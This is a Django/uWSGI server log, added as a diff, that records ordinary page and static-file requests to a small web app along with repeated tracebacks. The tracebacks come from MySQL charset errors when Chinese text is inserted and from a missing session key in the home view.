+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 307/395] 219.228.146.146 () {48 vars in 988 bytes} [Thu Jan 14 07:53:23 2021] POST /kind-manage/? => generated 206957 bytes in 156 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 308/396] 219.228.146.146 () {38 vars in 845 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 309/397] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 310/398] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 311/399] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 312/400] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 313/401] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 314/402] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 315/403] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:53:23 2021] GET /static/css/spinners.css => generated 3516 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 316/404] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:53:23 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[]
+[pid: 2069|app: 0|req: 317/405] 219.228.146.146 () {40 vars in 898 bytes} [Thu Jan 14 07:53:27 2021] GET /all-2-0-0 => generated 8235 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/406] 219.228.146.146 () {38 vars in 769 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/407] 219.228.146.146 () {38 vars in 767 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/408] 219.228.146.146 () {40 vars in 810 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/409] 219.228.146.146 () {40 vars in 808 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/410] 219.228.146.146 () {40 vars in 826 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/411] 219.228.146.146 () {40 vars in 816 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/412] 219.228.146.146 () {40 vars in 878 bytes} [Thu Jan 14 07:53:28 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 2069|app: 0|req: 318/413] 219.228.146.146 () {40 vars in 887 bytes} [Thu Jan 14 07:53:31 2021] GET /home/ => generated 59194 bytes in 52 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 38, in home
+ response['uid'] = request.session['uid']
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__
+ return self._session[key]
+KeyError: 'uid'
+[pid: 2069|app: 0|req: 319/414] 219.228.146.146 () {40 vars in 886 bytes} [Thu Jan 14 07:53:44 2021] GET /home/ => generated 59193 bytes in 45 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/415] 219.228.146.156 () {38 vars in 859 bytes} [Thu Jan 14 07:53:50 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 320/416] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:54:33 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[]
+[pid: 2069|app: 0|req: 321/417] 219.228.146.146 () {40 vars in 899 bytes} [Thu Jan 14 07:54:36 2021] GET /all-2-0-0 => generated 8235 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 322/418] 219.228.146.146 () {40 vars in 889 bytes} [Thu Jan 14 07:54:38 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/419] 219.228.146.146 () {40 vars in 822 bytes} [Thu Jan 14 07:54:38 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 323/420] 114.87.230.234 () {38 vars in 864 bytes} [Thu Jan 14 07:54:41 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/421] 114.87.230.234 () {40 vars in 864 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/422] 114.87.230.234 () {40 vars in 886 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/423] 114.87.230.234 () {40 vars in 867 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/424] 114.87.230.234 () {40 vars in 866 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/425] 114.87.230.234 () {40 vars in 872 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/426] 114.87.230.234 () {40 vars in 847 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/427] 114.87.230.234 () {40 vars in 861 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/428] 114.87.230.234 () {40 vars in 863 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/429] 114.87.230.234 () {40 vars in 845 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/430] 114.87.230.234 () {40 vars in 852 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/431] 114.87.230.234 () {40 vars in 907 bytes} [Thu Jan 14 07:54:41 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 324/432] 219.228.146.146 () {48 vars in 969 bytes} [Thu Jan 14 07:54:45 2021] POST /login/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 325/433] 219.228.146.146 () {40 vars in 884 bytes} [Thu Jan 14 07:54:45 2021] GET /home/ => generated 7942 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 326/434] 219.228.146.146 () {40 vars in 889 bytes} [Thu Jan 14 07:54:59 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 327/435] 42.236.10.114 () {34 vars in 791 bytes} [Thu Jan 14 07:55:04 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 328/436] 42.236.10.114 () {40 vars in 877 bytes} [Thu Jan 14 07:55:05 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 330/437] 219.228.146.146 () {40 vars in 906 bytes} [Thu Jan 14 07:55:06 2021] GET /kind-manage/? => generated 8286 bytes in 47 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+[pid: 2069|app: 0|req: 330/438] 219.228.146.146 () {48 vars in 989 bytes} [Thu Jan 14 07:55:06 2021] POST /kind-manage/? => generated 206958 bytes in 145 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 331/439] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 332/440] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 333/441] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 334/442] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 335/443] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 336/444] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 337/445] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 338/446] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:07 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 339/447] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:07 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 340/448] 114.87.230.234 () {48 vars in 1009 bytes} [Thu Jan 14 07:55:09 2021] POST /login/ => generated 209801 bytes in 155 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 341/449] 219.228.146.146 () {42 vars in 937 bytes} [Thu Jan 14 07:55:11 2021] GET /kind-manage/? => generated 8286 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 342/450] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 343/451] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 344/452] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:12 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 345/453] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:12 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
